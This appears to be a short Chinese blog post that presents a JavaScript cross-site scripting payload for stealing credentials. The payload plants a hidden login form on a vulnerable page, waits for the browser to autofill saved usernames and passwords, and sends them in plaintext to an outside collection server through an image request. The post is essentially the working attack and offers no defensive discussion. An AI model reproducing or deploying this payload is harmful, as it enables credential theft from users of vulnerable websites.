xss获取明文历史表单

[cc lang=”javascript”]
function create_body(){
document.write(‘‘);
}
function create_form(user) { /*获取明文密码*/
var f = document.createElement(“form”);
f.style.display= “none”
document.getElementsByTagName(“body”)[0].appendChild(f);
var e1 = document.createElement(“input”);
e1.type = “{set.type1}”;
e1.name = “{set.name1}”;
e1.id = “{set.id1}”;
f.appendChild(e1);
var e = document.createElement(“input”);
e.name = “{set.name2}”;
e.type = “{set.type2}”;
e.id = “{set.id2}”;
f.appendChild(e);

setTimeout(function () {
username = document.getElementById(“{set.id1}”).value;
password = document.getElementById(“{set.id2}”).value;
if(username==null||username==””)
{

}
else
{
var newimg = new Image();
newimg.src=”http://bugging.com.cn/index.php?do=api&id={projectId}&username=”+username+”&password=”+password;
}
}, 2500); // 时间竞争
}

create_form(”);
[/cc]

发表评论

电子邮件地址不会被公开。 必填项已用*标注